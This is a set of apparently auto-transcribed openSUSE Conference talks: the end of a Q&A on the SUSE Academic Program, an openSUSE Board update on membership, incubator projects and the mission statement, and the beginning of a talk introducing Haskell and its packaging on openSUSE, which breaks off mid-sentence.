home and the machines that are being used until the very biggest machines, the mainframes, because also mainframe run on SUSE, then you can have the whole line of machines from R&M, R&M machines, Raspberry Pies until the mainframe and everything in between runs on SUSE. So I thought that aspect is really great why it's now fantastic to have a slash available on the Raspberry Pi. I was trying to switch but it doesn't have the buttons. So let's do it like this. Yeah, well here is the SUSE con. As I said, SUSE con in September and well, not that far away from here. So you're all very welcome and especially the people from academic institutions where we have the special program for. So two call for action actually. Like to see you again at SUSE con 2017 in Prague and you can go to the website www.susan.com slash academic, subscribe there and you're all welcome. Any questions at this point about the academic program? Would you like to use the microphone? Yes. As soon as you're willing to share next to their code base also stuff like this with the open SUSE community. I'm sorry, I don't understand what is SUSE not sharing with open SUSE? Is there something we are not sharing? You're talking about the material being well in fact closed to outsiders. Could open SUSE people have access to the material to use it for open SUSE trainings? Oh, the training material that's available. You're talking about the training material that we've developed at SUSE that's being used to train both our customers, partners and now also students if it's also available for people from the open SUSE community. That's your question. It's a good question. We have got our material available through the training partners. So if you are known with the training partner, as I said in Germany we've got four partners in the Netherlands one all over in me at 40 training partners and they are now responsible for dividing and delivering the training including training material to the market in those countries. So if you have specific questions you can either come to me I can tell you who is delivering the training material in your country and then it's up to the commercial training company and you to find a solution and if you're working for a university it's even easier because then you have access through the material to the academic program. I hope that answers your questions. Yes it does. All right, great. Thank you very much. Great question actually. I didn't think about that aspect of the training material being available. Any other questions? Yes, you have been talking about academic institute organizations in general but also very often you have mentioned universities. So I have kind of contacts with some local university and also some IT schools. So I would like to know if there is any difference regarding the program for a university or something such as small let's say. Yeah. Excellent question. There are quite clear regulations set up and actually it all comes down to as long as it doesn't compete with my commercial training partners then I'm fine. So if it's a very small academic institute and they have no commercial site business or something then absolutely everybody is very welcome to join the academic program. In fact once you subscribe depending on where you are in the world we will look for every single person, every single subscription to the academic program if it's truly academic. But we even have like the police school in the Netherlands, the military schools, those kind of institutions are also fulfilling the requirements. So we are not strict as long as it's not interfering with the commercial training business. Is that a clear answer to your question? Yes? Okay, thank you very much. I'd like to hear the institutions you're talking about. Any other questions? Yeah. I would like to know in the past there was a comp tier here. Oh there, hey. In the back, hi. In the past there was a comp tier training certification including LPI, SUSE and comp tier as well. Is this going to be the case in the future? Again a very good question. If you've been talking about this before, a very good question. At LPI, comp tier and SUSE there was a cooperation regarding the certification. If you did the comp tier certification you would get the SUSE administrator, Linux level and the LPI level one alongside. From SUSE we had to stop that project because we had people certifying for SUSE technology while they never ever touched the SUSE machine. And that was a challenge we had to deal with so we had to figure something out and we actually came up with a solution for that because if you are now, if I can easily get the picture back with the certification, but we've got the certification in different levels and what we did now is if you think because of your comp tier or LPI certification that you qualify for the higher level, so the engineer level certification, you can straight go to that exam, skip the lower level exam and if you pass the higher level exam you will get backwards also the lower level exam. That means that we have covered that everybody who has got a SUSE certification knows the technology but you still have the biggest pro of that old model that if you are LPI or comp tier certified for Linux technology in general and you prove to us that you also know SUSE technology by succeeding the other exam, you don't have to do two exams, only one exam and you're ready and you're certified at the highest level. Okay, thank you. Is it clear? Yeah. Okay. Thanks. Another question, Linux Foundation has also on certification by now. How is our SUSE's academic process influencing or in regards to that? It's the same. So it's the same as LPI and comp tier. There are a few minor differences but it's about the same ID. So if you prove to be certified at Linux technology at the entry level, you can go into the higher level of SUSE certification and once you pass you get the other one afterwards. So it works the same. Great questions actually. Really good. So next question. Yes. What was the decision to actually look at ruling out the private universities and any for profit or did you come up with a model? Are you talking about coming up with a model for private universities or even charter schools we look at? In that case they're sort of private, they make money. You know, I mean it seems like the program, while good, yes, is ruling out a certain area I think we would want to address and perhaps, I mean maybe it's somewhere in between the commercial and non-profit school. Yeah, you're perfectly right. It is a gray area. In the Netherlands we've got companies who are sort of training students but they have a commercial goal. There are clear guidelines and we will keep those guidelines, we'll look at them and judge whether or not it's competing but for some countries I will look into it if it's not competing with my commercial institutions and if my commercial training partners don't mind that that specific commercial academy becomes part of the academic program then I'm fine with it as well. So the main goal of SUSE is to train as many people as possible in SUSE technology, color as many people as possible green but we only can do that if the commercial training partners are having a good business case. And if we are destroying the business case of the commercial training partners we will have no commercial institutions who bring our training to the market. So that's basically the challenge that we're dealing with but the gray area, I'm willing to look at the gray area and see if we can come up with a solution, if they either have to fit into the commercial model or in the academic model. So please start the discussion and we will find some way to get as many people as possible colored green. Any other questions here in the front? Thanks. How do you plan to advertise the program? Do you plan to go directly to universities and advertise it or go to university fairs or what is the plan? Wow, those questions, really good. This is more about the marketing. We've decided that we create an academic program because there was a demand. There was a demand from academic institutions come up with a program. So that's what we did. And the focus of SUSE is on helping customers and selling subscriptions, getting happy customers. And what we've done, we've created a program and our goal and maybe hope is that the program will totally sustain itself. So everything should be available and there are people picking up the phone if you have specific questions. So we've got two people, one for EMEA, one for the rest of the world, who's picking up the phone if you have a question about the academic program. We're trying to keep it that low, I say that labor, so that we don't have to invest too much time in getting it. But on the other hand, I was allowed by SUSE to come up here, to come to Nuremberg and to present the academic program. And I've been presenting it two weeks ago in the Netherlands and I will do it a couple of more times at different places. So that is the marketing, but we really hope that it will sort of fly off itself because we think we've created a program which has such a low boundaries as an academic institute. Why would you not enter this program? If you compare it to commercial vendors who have academic programs, then they quite often are you have to pay a certain amount or they're all kinds of boundaries you have to get over. Well, this program, that's how we hope it will work. If it doesn't work like this, so if not enough people know about the academic program in some time, we will evaluate it and we will start the marketing campaign. Is that a satisfactory answer? Somehow, somehow. Yeah, you think, yeah. Yes and no. Well, if it will work out like this, we will see, but if it doesn't work out, we will pick it up and bring it to a higher marketing level. But maybe if the open SUSE community likes it a lot and you all here at this room like the ID, what we all can do is bring it to social media and shout it out, tell it to everybody you know that there is a very easy to subscribe to academic program and let the word of mouth as it's called do its work. Any other questions? No? Oh, that's excellent. Well, thank you very much and I really want to thank you specifically for those questions at the end because they were really, really great questions. And again, remember, this is the website, that's the marketing we do for now and if you have any questions about the academic program, feel free to approach me at any time. Thank you very much. Have a great day. Thank you.
The new SUSE Academic Program explained! As a leading open source company, SUSE supports schools, higher learning institutions and the academic community in getting free access to our extensive experience and knowledge. Many IT-students still get trained in software stacks that are not the highest in demand by the labor market. In many cases IT-infrastructure classes are still dominated by proprietary software, but the dominating IT-infrastructure "in real life" nowadays is open source technology. As SUSE delivers enterprise open source technology many schools have asked SUSE to come with a academic program now we are able to explain you most bits and bites of how we believe we can color schools and students green!
10.5446/54491 (DOI)
All right, then. Okay. So with the board, this is the last thing, the final stretch. Everybody had a good time? Yeah. Awesome. So we did something a little bit different this year. Normally, every year, after the board get elected, we have a big annual meeting where we have Suzer host us and we visit Suzer and we basically spend several days locked in meeting rooms discussing about what does the project need to have done, what do we need to sort out, et cetera. And we normally do this in like Easter time. But as you will remember, we had a few problems with our election tooling this year. So we didn't actually get the election finished or later on. So we had that meeting the last three days before the Open Suzer conference, which is why we all look so tired because we've been here for six days. But it means that we've got this chance to kind of give you an update of what we've been thinking about and kind of the agenda that we want to set for the next few years, the next few years, next year in the project. And the short and simple summary, because I don't want to take too much time, it's the last day of the last session or the last bit of the conference, we've been busy. We've been really busy. In fact, when we started this meeting, we've been thinking along the lines of the project's been through a whole lot of change in the last few years. We've done LEAP, we've completely revamped Tumbleweed. There's been huge technical change in the project. And the plan was we're going to take it easy this year. The plan was useless. It's not going according to plan, but it's way more exciting as a result. But that's where we started. So we were thinking about kind of tidying up what's things that need tidying up in the project. There is a fair bit of sort of organizational craft lurking around in the project. Things like wiki articles, policies, procedures, old corporate statements from the Nevelle days, feature requests, et cetera. We've started tidying that up over the last few days. So if you get a whole pile of emails from FATE, that's us, we've been closing FATE entries, which have already been done in the distribution. We've been closing feature requests that are just never going to get done, or we think are never going to get done. If we're wrong, reopen them, find someone to do them. We are going through the wiki and tidying up various parts there. This isn't a job just for us and the board. If there's things that you see that you think, why is that there? Why is no one fixed that? Dive in, help, tidy up. We're trying to clean all of that craft out that's just kind of left lingering around for the last few years. We've made a start. As a FATE example, we actually managed to break open FATE while doing all this tidying up by making too many changes at once. That's getting fixed now. Moving along there. That's going to be an ongoing thing for the year and we really want to help anybody who's moving there. If you have any questions, if you think anything needs the board to review, just mail border openSUSA.org will help you tidy it up. While thinking about that, and actually this point came from Martin as well, 42.2 is now live, 42.3 is in development, and 42.1 went end of life a week or two a year ago. We've noticed already, and we've seen from the mailing list, we've seen from our users, that not enough users really followed the release cycle that we had planned for LEAP. There's a lot of people still lurking around on 42.1, they didn't move to 42.2 in the six months that they had. It's kind of obvious why we kept the old terminology from the old openSUSA way of doing things, where we used to have every single version being a major version, which meant there was going to be some risk of change when you moved. That doesn't really make sense for LEAP. Every single minor release is a minor release. It's based on a SLEEP service pack. The question was asked, and we've decided that with LEAP 15 coming next year, don't be surprised when the messaging side of things, we start using terms like service pack or maintenance pack to refer to those minor releases. We're going to be making sure that release announcements and marketing announcements make it much, much clearer what that release cycle is. The end of life period starts from the second. The end of life period for a previous service pack starts. The second, the new service pack is released. The six months from that point. We want to help get that message out. Please help us. Please remind people that a minor release is just a service pack, really. Another thing we were looking at, and anybody who's been in the project for more than a year knows we've been looking at this, is an issue with the membership program. So obviously, to elect the board, you need to be an open SUSE member. And currently, to be an open SUSE member, you have to have a bit like a bunta or gnome, had to have been a contributor for a while and have sustained and substantial membership, which is a real pain in the ass to actually figure out if that's true or not. We have a long complicated process of applying, waiting, the tool breaks and accidentally loses certain requests. And ultimately, most of the time, we're just guessing if the person really has contributed or not. And also, over time, even though that does eventually work and they do eventually become members, it means that it's also very hard to un-become a member. We have loads and loads of members on our list who don't do anything in the community anymore. We're 12 years old, they've left, they've moved on, fine. It means actually that, well, these guys, not me, I'm different with me, but these guys are basically uncontrollable dictators at this point. Because they're all elected by the community, by the membership. But the plan in the original policies of things is 25% of the members can cause a recall election of the board. Well, right now, we can't contact 25% of the membership on the list. So they have complete power. Suzer can fire me, but they can't give it to them. We the board, all of us don't like that situation. We want to be more accountable to the membership of the community, to the community at large. So how do we fix that? We're going to be changing the situation. So a single contribution to open Suzer is enough to be eligible for a member. You still have to apply for it and want to be a member. I'm not just going to randomly give out membership to anybody who's done anything once. But if you have one measurable contribution, be that an actual bit of code or mailing this post or whatever, it's enough to become a member. The exact details in the tooling of automatic approval or confirmation is a work in progress. The Covent tool we have, we want to decommission. We do have a few scripts that are helping us with that process, but if you're interested in helping us with this, Mirhal is currently doing most of the work he could do with people helping him. We will be looking, we will be already using a tool to automatically renew membership. So if you are contributing at least once a year, this will never affect you. You're a member, done, fine, no problem. If for whatever reason you drop off the radar from the tool's perspective, like changing your email address, for example, we'll probably cause that. Once a year, this tool will ping you and say, hey, do you still want to be a member? The principle that we want to keep throughout all of this is an open Suzer member remains a member as long as they want to be one. So that ping isn't a direct to get rid of you. It's just making sure, are you still there? Are you still interested? If you are, cool, fine, good, done. Still a member, at least for another year, then the bot might be stupid and ask you again. We'll see. But we need help with all of that tooling. We need help with that. And especially as we did a test run of the tool while we were here and we accidentally deleted 90 people that we didn't mean to. So incredibly sorry about that. Please just email us. We'll put your membership back. Yeah. Beta testing is always fun. Sorry. Anyway, that covers the membership side of things. Another thing that was on the agenda for the meeting was handling the rough edges of the project. Everybody should know from me ranting last year on this stage, this is an area that's incredibly close to my heart of, what do we do about the unsupported parts of open Suzer? What do we do about people using develop projects or the unofficial spins of Krypton and Argonne or new initiatives like Cubic was here? These things are something which people want to use. They're going to use it. They're exciting things. But they're not that level of quality that we, the open Suzer community, are normally doing things. They're not being tested by OpenQA. They're not built to the standard policies we use in Tumbleweed or Leep or anything like that. And how do we handle, well, when we started this, we were talking about how do we handle the rough edges? Do we kill or drop these or whatever? But as we were discussing this week, we realized that that isn't actually the question that needs to be answered. The question is sort of how do you handle people's expectations of these bits of the project? So when they use them, they dive in knowing this might not, this is still open Suzer, but it might not be finished yet or might not be totally that same level as the main deliverables that the open Suzer project gives. So like you can see there, Open Suzer Incubators is a program we're starting, basically ripping off the idea entirely from Apache. Apache solved this problem their own way. And from the way we see it is sort of an official stamp of both intent and quality. Any Open Suzer Incubator project is an Open Suzer project, and it's something we're actively working on. But from a quality perspective, it's an Open Suzer project that isn't quite yet of that quality, but it's aspiring to be there. It's going to be there sooner or later. The sort of things that we're thinking of, like I said, things like Crypton, Argonne, where the communities there are working on testing, working on improving these things, they're trying to get there. It's a perfect example of the sort of thing which we think would make a good Open Suzer Incubator project. We want the kind of badge to be relatively easy to get. A casual application to the board is the way we're thinking of managing it to at least to start with. And we're going to ask a few simple questions like, is it more than one contributor? Do you have one or two people doing it? Have you thought about testing this? Have you thought about that? But this isn't going to be any hard definitions because these projects might not be something that's easy to compare to what we're already doing. This might not be another distribution. This could be something like a spacewalk build for Open Suzer, which wouldn't fit in that same concept. So how do we handle that? We're not going to make long, complicated policies. It's not a way of doing things. We'll have this simple process. You apply, we think about it, talk it out, you're an incubator, and then we'll make it a little bit harder just like it already is to have that as a fully official Open Suzer project where there'll be some probably still subjective criteria, but making sure that we're using the Open Suzer name on something that is polished, tested, done the proper way just like we do everything else. And again, with all this stuff, we need help. We need to know which projects would make sense to become these first incubators. We need help tidying up these processes and criteria. And of course, this could potentially have a big change on things like the tooling. We were thinking about with develop projects in particular. There's a lot of develop projects where they exist purely as a development messing around ground to put stuff into tumbleweed. You don't want users touching them ever, and if they do, they're going to break. But there's other develop projects like Nome Next and the KDE unstable ones where they're built with users in mind for potentially testing and playing around with the latest version of the various stacks. And they're tested and they're looked after and they're moderated properly. Their develop projects still for factory, but they could also be incubation projects too. If that happens, we're going to want to reflect that in tools like software.opensuzer.org. So they're treated as a different tier of not official, but do not touch, be scared unsupported nonsense. So we'll need help reflecting that in the tooling and the websites, et cetera. So we haven't put anything on the open-suzer project yet, but we will, or if someone wants to start the discussion straight after this, start on the mailing list, we'll talk about it. Job done. Nearly there. Next year, OpenSuser Conference. We've been thinking about that. I hope we've already said everybody had a good time. We love coming here. It's been as much fun this year as it was last. But we're thinking for next year doing something slightly different. Mainly thinking the idea of co-locating with a different event. And obviously, we're close to Prague. There's lots of contributors we have in Prague. There's another Suzer office in Prague, which makes it easy for the budgeting side of things. So we're thinking of taking OpenSuser 2018 to Prague, the university they have there, co-locating with the crypto-fest, which conveniently happens about the same time this time next year. Nothing's absolutely certain yet. If it doesn't work out, plan B is to come back to here and do another OpenSuser Conference in Nürnberg. And even if this happens, the board's thinking of having a model of one year having the conference in Prague and trying to co-locate with something there. And every other year, coming back here, having OpenSuser here, because it works. We love it. It's been great. And then last but not least, mission statements. We had a long, long discussion about the OpenSuser mission statement. First, because we were thinking of tidying stuff up, like, why do we even have one? Other projects don't. The door would do. But Debian don't and the gods don't have this. But we decided that we think it matters. It sets the tone of the project or more accurately reflects the tone of the project and is the first thing that everybody quotes when they say what is OpenSuser. You can just look at it, especially in the last few years where we've been getting a lot more media attention. The OpenSuser mission statement gets cited in every single mention of us in conference web pages, in news articles all the time. It's the first thing a newcomer is likely to read. And our mission statement currently reads this. OpenSuser is a worldwide effort that promotes the use of Linux everywhere. And it was. That's what we started doing 12 years ago. Then we started looking at, okay, what do we actually do in OpenSuser? And I mean, this is just a tiny example. These are all the OpenSuser subprojects. You've got testing tools. You've got a huge collection of different things which are all OpenSuser in their own way and they're not necessarily Linux. So should the mission statement have been something like this? A worldwide project that promotes the use of Linux and build tools and testing tools and system tools and software delivery tools and collaboration tools everywhere? No. While we were talking this out, we kind of realized that both, especially this one, but even the original one misses the whole point of what's actually special with OpenSuser. Because it's not just about what are we doing, but how we're actually doing it. And some of the things that really set OpenSuser apart from everything else is the fact, as a community, we really care about working openly. Having not just open source, but open discussions, different ideas. Our entire development project model is built to look at the idea of we're going to have different teams working in different ways. So let's find a way of cramming that all into factory. It's just the way we think, having open processes in everything. But even though we do everything openly, we worry about doing things right in the first place. Half of those tools exist because we care about engineering things properly. We care about doing it the right way. We care about building it reproducibly in the build service. We care about testing that stuff properly. And our cover mission statement just kind of ignores all of that and doesn't even mention it. And we also really embrace the traditional open source way of scratching your own itch. Nobody sets the agenda for OpenSuser more than the community does when they're doing it. You know, we are open. You set it. Well, we set it. There's no difference. There's one consistent mess of everybody doing whatever they want to do. And how do you really sort of reflect that when we're trying to set mission statements of what the community does? So I mean, this isn't final. Basically, I'm going to have to write all of this up in this explanation way better because I haven't had the time while I've been at the conference. But we're going to be talking on the mailing list about this new draft of redefining the mission statement as OpenSuser, openly engineered tools to change your world. You know, basically really focus on all those main aspects of we do everything in the open. How we engineer stuff really, really matters. The use case of why, what are we doing it for is whatever our community wants to do it for. It's your itch. It's your things you want to change. And of course, ultimately everything we're building is a tool in some form. Be it the build service, which is more open QA, which obviously one, but the distribution themselves. Ultimately, they're useless if they're not doing something, they're tools. And that is the last thing I have on these slides. So with that, does anybody have any questions about this or anything else in the project? Or does everybody just want to go and have beer? And just for the mission statement, I would say when we talk about community, it's a community of human and not a community of tools. Then perhaps we have to find a way to put somewhere here inside the sentence human. But the human part is the your, we're not making this for robotic AI yet. But it's a fair point. We did discuss that. We actually went round and round in circles and tried to figure out how to put a human message in there. But we thought the your world part did that. But it's a fair point. When we put this on the project mailing list, I fully expect a really long mailing list to read. Don't be surprised about it. This is just a draft. It says draft. But this is what we were thinking about. Cool. Okay, then. Yeah. Christian, you go on. Tools and processes perhaps, because I think it's equally important to make an open tool in an open way. I think you have that openly, but process is like a bigger word that would wrap many of those concepts now. I can barely hear the word you're saying because of the speaker. Sorry. Anyway, just wanted to say maybe processes as well as tools, because I think this is equally important. Processes instead of tools. Yeah. Yeah, totally. I mean, the openly part was kind of meant to imply that. Trying to fit all the stuff in a sentence is killer. But yeah, we're working on that one. Yeah, I like the new statement. I'm just surprised because I thought we just changed it two years ago to the maker's choice. Nobody mentioned that. That was a marketing tagline that wasn't our mission statement. Okay. Yeah. I think that's all of this stuff that we've explained here, or I explained here. In our mission statement, we have paragraphs explaining what we're trying to mean behind that. And that's what the whole mission statement will do in full. That's just the short, simple part. Hi, Mark. I just want to say I like your mission statement. Usually, when people get together to have a mission statement, you take the number of people on the committee multiplied by eight, and that's how many words are in your mission statement. So I think you guys have done a really good job trying to keep it minimal. That is totally Thomas's. He deserves all the praise for that because our original version was like that long. It was terrible. And then he got the clipboard out. He's like, start voting on these words, and we're going to kill them. We got down to this. Thanks. Thanks to Thomas. I just want to bring up a topic that we're working on with Linux Magazine. We're going to try to get a magazine out called Getting Started with Linux. And so we were going to have them work on that for 42.3, and we need some articles. So if any of you are interested in writing something specific about 42.3 for a magazine, contact me. Cool. Great. Thank you. Okay, then. Thanks a lot for a great conference. And yeah, see you all next year. Hopefully in Prague. Oh, sorry. What do you want? Just a quick check. Who is aware of the TSP? Just want to make sure. Okay. Maybe I should rephrase the question. Who's not aware of what the TSP is? Perfect. You can explain that. Right. So OpenSUSA have what's known as the travel support program, hence the TSP, because we're in technology, so we like acronyms. And the aim of the TSP is to enable community members to represent the project at other events, at venues, et cetera. So if you would like to attend a conference or some other event, but it's not necessarily pocket change, so it's not just 10 euros to get on the train or whatever, you can submit request to TSP. The current and foreseeable deal is that the TSP will pay up to 80% of your travel and accommodation. We do check to make sure that you can get potentially cheaper flights, but it's fairly easy to apply for. So just make sure that when you do submit a request, currently it's through Connect, but that's not a major issue. It'll just be moved to a different piece. But if you go via the Wiki, if you just search for OpenSUSA, TSP or OpenSUSA travel support, you'll easily find it. Hopefully, we can have an easier URL to remember. But I just want to make sure that if you are interested in representing OpenSUSA in whatever shape or form and you'd like help to do that, please do submit a request. If we've got any questions, we'll get straight back to you. TSP will just confirm with the board to make sure that everyone's happy. With that, chances are, actually, I don't know of any reason in the past that the board have complained. I know one. Putting my other hat on for a second as a SUSA chairman, the protocol for SUSA employees who happen to be contributing, and there's a few of you in the room, is subtly different. The TSP is there to help, but SUSA wants to make sure that SUSA is paying for SUSA first before making the community pay for anything. So the TSP is only available for SUSA employees who also contribute to OpenSUSA once your manager has already said no, and as long as you're actively contributing to the event in question, like doing a talk about OpenSUSA there. It's still there for you, but really try and get your manager to pay for it first, and SUSA should be paying that. That's the only time I can think of we've ever said no. So that's all. Does anybody have anything else they want to talk about? Any questions, you guys? Any complaints? No? If that was true, the project mailing list would be so much quieter. All right then. Thank you very much.
Like every year, the last session will be a meeting with the openSUSE Board.
10.5446/54493 (DOI)
Okay, I suppose I'll just begin, right, if some people are late and they won't miss that much in the beginning. Okay. Is everything all right? Okay. I'd like to talk for a bit about the state of the Haskell infrastructure in the open Zeus family of distributions. I have split the talk a bit in two parts and the first part is basically supposed to introduce people who know about open Zeus but who have no idea about Haskell. I'd like to show a bit of the language Haskell and why it might be worthwhile to look into that and why open Zeus distributions are a good place to do that. And the second part of the talk is then geared towards people who may be developing in Haskell but who don't know that much about open Zeus and who would like to know how do I set up my development environment, how do I deploy my programs and last but not least, I'd like to share a couple of experience and insights into what it feels like to manage a package set of about 2,200 packages these days, which we, as I learned today, I think except 100 of those which are still in the submission queue, everything else is actually available in factory these days. So there was quite an interesting effort to get that done. So Haskell is an item, I suppose that everybody who's here has heard the name at least. The language has a couple of very nice properties that I enjoy about it very much and since I, for the most time of my life, I was a C++ programmer, what I like about Haskell very much is the concise syntax. It's very much inspired by the notation of mathematics and mathematical notation is arguably very successful. It's been developed for 2,000 years or longer and it's extremely expressive and short. And it's the same in Haskell. If you program in Haskell, your source code is crisp and clean and you can read it easily. If you write C++ a generic function, then you have all kinds of boiler plates. You have to inherit iterator traits. You have to have all kinds of template keywords. You have to have a structure around it, define operators and whatnot and you have 80 lines of code for like one line of payload. And in Haskell, this is very much different. So this is real source code all and when you define a function that's supposed to square some value, then this is all you write. So there is no boiler plate at all. All these you'll find that this is fairly similar to Python. In Python, you could write an almost identical definition of square. You'd have a couple of extra brackets and you'd have a def keyword at the beginning. But the difference is that this is actually a statically typed language. So all these functions and all these constants have a very precise, very accurate type that is verified at compile time and you cannot use them in an unsafe way. In the next slide, we'll see what's going on. And so the square function is fairly obvious. Then you have a nice feature that this modulo function, mod, is a normal function. It takes two arguments and returns a result. And what you can do in Haskell is that if you put the function name in these backticks, then you can write it between your operands. So you could write mod x2 equals equals zero or you can write it this way and use it like an operator, which is sometimes more expressive. You have list comprehensions. So if you see the definition of this list of integer values there, all these three definitions are all equivalent. And you have the list comprehension syntax, which everyone who is familiar with math will recognize. You have the second line uses a higher order function. So you have filter is a standard function, which iterates over all elements of that list, which is given as the third argument and applies this attribute to each of them. And whenever this even returns true, the result is kept in the list. And if this even returns false, the result is dropped from the list. And so you can create the list of even numbers, which is ultimately the same thing as that third line. And you could write it just like that in Haskell and would get the same result. And what is also kind of nice about this, this is an infinite list. So this list has no end. And it contains all the numbers. You can think of it like a generator in Python, right? It's not actually a list, but it's know-how that tells you how to generate that list if you consume it. Then for the last example is the odd numbers. There is also, here is a feature that's particularly nice that's occurring. So what this does is the plus operator is a function that takes two arguments. And when I provide one argument already, then this turns into a function that takes one argument and gives a result, right? So one argument has been bound already. And you know the same thing from C++ maybe, but in C++ you have an explicit bind function to do this. In Haskell you can just write the argument there and transform the function into one that has one argument less. And then you end up with something you can map over this list of even numbers to get at the result you get there. So all this code tends to be extremely short and expressive even though it encodes fairly sophisticated concepts. The Haskell type system is very nice. It's a statically typed language. It has very strong typing. So unlike in C for instance, if you have a function that expects and signed integer and you pass it an unsigned integer, then this is a compiler error. You can't do that. You have to explicitly convert these different types and catch the overflows or underflows if you want to. But the thing is you can't, types are very strictly enforced. And when we look at this square function from the last slide, it has a very accurate type, right? Some type A and returns some other type A. So the information is we don't know what type it is, but it takes, returns the same type as it gets. And there is one constraint on that type. You can't just pass it anything, but you can pass it only things that are instances of the class num. And the class num, this is the definition or a short abbreviated definition, has the distinguishing feature that it defines this operator. So makes perfect sense intuitively, right? So if you use this operator here, then you can use this function only on things for which this operator is defined. Again, this is something that you would be able to do in Python as well, right? If you have a Python function square like this and you pass it something that has a multiplication operator, then it works, right? But the difference here is that if I define a new type, foo for instance, and then we define the multiplication operator for this. And this is perfectly legitimate code, right? You can multiply foo in this way. But you cannot pass foo to square because this multiplication here is not the same multiplication as this one. So the only way you'll be able to pass foo into the square function is if you define foo to be an instance of num. So you explicitly say, I fulfill this interface. And if this data type fulfills this interface, then you can use it. And so all the fundamental concepts of different kinds of numbers, integrals, floating point numbers are abstracted in type classes in Haskell. And all the code that you write always works for all instances of that class. So when you write mathematical function, then you can use them with a double or you can use them with a multi-precision GMP whatnot object which takes lots and lots of memory. This is you don't care, right? This is the same thing for you. Another very nice feature is the ability to define polymorphic algebraic data types. So for instance, an optional value is typically encoded in a maybe. This data type has two ways to construct it. You can construct it with a just, anti-actual value, or you can construct it saying nothing. And then this is a type you can pass to a function. For instance, this function is going to greet someone and you pass the name of the person and it's supposed to greet. And if you pass it with just world, it's going to say hello world. And if you pass nothing, then it's going to say hello stranger as a default. And so this is a very concise way to express an optional value and you unresolve this ambiguity through pattern matching. So you just write multiple cases of your function and the one that matches is going to be the one that's chosen. And then there is another feature which is arguably the most mind-boggling one and that's referential transparency or it's called a lazy evaluation. It's the common name. And what that means is that, no, not lazy evaluation, excuse me, it's a pure functional, purely functional. What that means is that the result of a function depends only on its arguments. So basically Haskell guarantees that if you call a function with one argument and you get some result, then every time you call that function with that argument, you will get the same result. And this means that the compiler can optimize all common expressions anywhere in your source code that take the same arguments away and compute them once and replace the result everywhere. For instance, this function which computes the length of a list, if you call it 10 times with the same list, you will get 10 times the same result. So now contrast that to the function string length that you know from C, for instance. If you pass string length a pointer, then this is the argument to your function. And now string length is going to iterate over the memory until it finds a zero byte and it's going to return the number of bytes it could iterate until then. So now if you change the underlying memory and call the function again with the same pointer, you'll get a different result because the memory has changed. So there is a hidden state somewhere, the memory in the machine, which is not visible in this type because the pointer you pass is both times the same pointer. And consequently, this is a function you cannot write in pure Haskell. So this function cannot exist, right, because it violates the guarantee of referential transparency. And the reference to transparency is nice for the compiler because it allows for great opportunities for optimization. But where it's really beneficial is for software engineers because what it means is that functions have no hidden state. If you have a function, that is a pure mathematical function. It takes five arguments and then all it does is work with those five arguments. There's no other global variable. There is no hidden state somewhere in a class method. It doesn't exist. It's just the arguments that you pass and those determine what the function does. So if you read Haskell code, then you can read one function as a time and you always have a complete algorithm that does something with the arguments it takes. Of course, you can go through all kinds of contortions to make the code unreadable anyway, right, but most of the time it's actually fairly difficult. And then this is another crazy scheme and this is lazy evaluation, which I was referring to before. So a Haskell program is evaluated from the end. So the compiler looks at what is the program going to return when it terminates? What's the end result? And then it goes backwards through the source code and finds all the expressions it needs to compute that result and everything that it doesn't need, it doesn't compute. So for instance, this is a list of integer and every single element of that list is going to throw an exception. So this list, this for instance, is going to throw an arithmetic error. This is going to throw an undefined exception. This is going to throw a violated assertion. Here we have a Boolean which says this list has three items or we throw an exception. So now the question is what happens when you evaluate that, when you ask the compiler, give me the value of B and the answer is you don't know. And this is actually for surprising reasons. So the compiler is completely at liberty to evaluate this part and if it does, it throws an exception or it can evaluate this part and in this case it's going to return true. The reason is when you look at the definition of length, the function that computes the list, right, it does pattern matching on the list, it says give me the first element, give me the rest of the list and then it does the recursion. But this value is never actually required as far as the function is concerned. This is just an entry in the list and I don't care what the entry actually is. This is not evaluated. So when you compute the length of that list, this is going to come out as three. There is no exception because none of those items is ever evaluated. You don't need to evaluate them to compute the length of the list. And so this Boolean is either true or it's user error fail and you don't know which one. So lazy evaluation has some mind-boggling consequences, it's sometimes very, very difficult to predict what's going to happen when you have complex code that has these properties. But the thing is that lazy evaluation helps combat a very dangerous thing called premature optimization because when you know that things that I don't need are not going to be evaluated and they don't cost me anything, it doesn't mean that you, it means you don't have to optimize them. If you think of an parser that parses an XML document, for instance, the XML document has like a thousand fields. So now you can devise a data type that contains all those thousand fields and it very nicely parses them and it turns the strings into numbers where it's a number and where it's an email address, it parses the email address and it gives you a very nice, very structured, sophisticated representation of the XML file. Now somebody who is processing that XML file uses your library and says, yeah, I just want, I don't know, the first element, I don't want the rest. It means that your parser is not going to pass any of the rest, it just parses the first element, says yes, your result and that's that. So you can define, you don't have to, this notion that you have to abort the computation at some point, you don't have to care about that. The runtime system does that for you. There is a lot more. There is, Haskell is, as far as I know, the most popular language in language research and compiler research and type system research and there is a lot of work going on. You have an interactive development environment which people who program Python know that you have this interactive shell in which you can call any function until you get the result and this works particularly well in a purely functional language because if you have a function that depends only on its arguments, that means you can call it in any context, right? There is no hidden state. So you don't have to set up some elaborate environment to call your function, you just pass it the arguments and then it works. So this is actually very nice for development. The type system in Haskell compilers is crazy. There is, they are working, the thing people are working on these days is dependent types and linear types and this is all very interesting research stuff that's being prototyped essentially in that language. You have another thing which I personally love is asynchronous exceptions. In Haskell, you can have any number of threads that are computing in parallel. You can have thousands of threads, doesn't matter. It's quite common to do that. And now one thread can throw an exception to another thread. And that exception is going to arise at whatever point that other thread is currently evaluating. So this means when you look at your source code and you're thinking what exception can happen now, the answer is everything. Every exception can happen. At every point of your source code, everything can fail with every error because another thread might throw you that thing and then you get it and it's your exception. And this is also something that boggles your mind in the beginning because there is no such thing as code that can't fail. But it's actually a very accurate representation of what computers are because when you assume this can't fail, you're probably wrong. And Haskell guarantees you, yeah, you are wrong. This can fail and this can fail with any error. You have to deal with everything at any point. There is software transactional memory. It's probably hard to explain, it's a way to write transactions without locking, which is very nice because it allows you to write composable software. There is the support for parallel computation is excellent. So when you write code in Haskell and you have a thousand threads all evaluating in parallel, that's perfectly normal. That's very efficient. You can use the Rheem solvers to prove properties of your code and last but not least, if you want to, you can cross compile the entire thing to JavaScript and run it in a web browser. It's very nice. So now you're thinking, man, this Haskell doesn't sound so bad. I want to try it. And on open source, that's actually very simple. So first of all, you need the basic development environment and this is the compiler, GHC. And this, the compiler and cabal install is the build driver which you use to build your package to do your interactive development. This is typically something you'll want. This is a part of, in Tumbleweed, you have the latest version of everything all the time. We update that basically once a week. In Leap, you're going to have in Leap 